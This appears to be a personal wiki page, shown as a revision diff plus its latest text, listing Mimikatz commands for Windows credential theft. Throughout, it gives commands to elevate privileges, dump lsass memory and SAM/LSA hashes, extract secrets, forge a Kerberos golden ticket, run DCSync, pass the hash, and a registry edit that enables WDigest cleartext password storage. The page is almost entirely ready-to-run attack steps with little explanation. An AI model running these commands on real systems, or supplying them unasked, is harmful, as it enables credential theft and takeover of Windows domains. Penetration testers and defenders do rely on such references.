Mimikatz: Difference between revisions
Jump to navigation
Jump to search
m (→Steal creds) |
mNo edit summary |
||
| (11 intermediate revisions by the same user not shown) | |||
| Line 1: | Line 1: | ||
=== | [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md Mimikatz cheat sheet] | ||
=== Elevate privileges === | |||
* privilege::debug | * privilege::debug | ||
* token::elevate | |||
=== Show recently logged on user credentials and hashes === | |||
* sekurlsa::logonpasswords | |||
=== Dump lsass via task manager === | |||
Task Manager > Details > lsass.exe > Right click > Create dump file > lsass.DMP | |||
* sekurlsa::minidump lsass.DMP | |||
* sekurlsa::logonpasswords | * sekurlsa::logonpasswords | ||
=== Dump | === Dump hashes === | ||
* lsadump::sam | * lsadump::sam | ||
* lsadump::lsa /patch | * lsadump::lsa /patch | ||
| Line 10: | Line 18: | ||
* lsadump::cache | * lsadump::cache | ||
* sekurlsa::ekeys | * sekurlsa::ekeys | ||
=== Secrets === | |||
* lsadump::secrets | |||
=== Create a golden ticket on the domain controller === | === Create a golden ticket on the domain controller === | ||
* lsadump::lsa /inject /name:krbtgt | * lsadump::lsa /inject /name:krbtgt | ||
* kerberos::golden /user:<USER> /domain:<DOMAIN.LOCAL> /sid:<SID> /krbtgt:<KRBTGT> /id:<ID> | * kerberos::golden /user:<USER> /domain:<DOMAIN.LOCAL> /sid:<SID> /krbtgt:<KRBTGT> /id:<ID> | ||
| Line 20: | Line 30: | ||
* lsadump::dcsync /user:<USER> /domain:<DOMAIN.LOCAL> | * lsadump::dcsync /user:<USER> /domain:<DOMAIN.LOCAL> | ||
=== Pass the | === Pass the hash === | ||
* sekurlsa::pth /user:<USER> /domain:<DOMAIN.LOCAL> /ntlm:<HASH> /run:cmd | * sekurlsa::pth /user:<USER> /domain:<DOMAIN.LOCAL> /ntlm:<HASH> /run:cmd | ||
=== Wdigest - extracting passwords in cleartext === | |||
* sekurlsa::wdigest | |||
==== Enable Wdigest ==== | |||
* <code>reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f</code> | |||
Latest revision as of 19:08, 24 July 2023
Elevate privileges
- privilege::debug
- token::elevate
Show recently logged on user credentials and hashes
- sekurlsa::logonpasswords
Dump lsass via task manager
Task Manager > Details > lsass.exe > Right click > Create dump file > lsass.DMP
- sekurlsa::minidump lsass.DMP
- sekurlsa::logonpasswords
Dump hashes
- lsadump::sam
- lsadump::lsa /patch
- lsadump::lsa /inject
- lsadump::cache
- sekurlsa::ekeys
Secrets
- lsadump::secrets
Create a golden ticket on the domain controller
- lsadump::lsa /inject /name:krbtgt
- kerberos::golden /user:<USER> /domain:<DOMAIN.LOCAL> /sid:<SID> /krbtgt:<KRBTGT> /id:<ID>
- misc::cmd
Retrieve the password hashes of user accounts from a domain controller
- lsadump::dcsync /user:<USER> /domain:<DOMAIN.LOCAL>
Pass the hash
- sekurlsa::pth /user:<USER> /domain:<DOMAIN.LOCAL> /ntlm:<HASH> /run:cmd
Wdigest - extracting passwords in cleartext
- sekurlsa::wdigest
Enable Wdigest
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f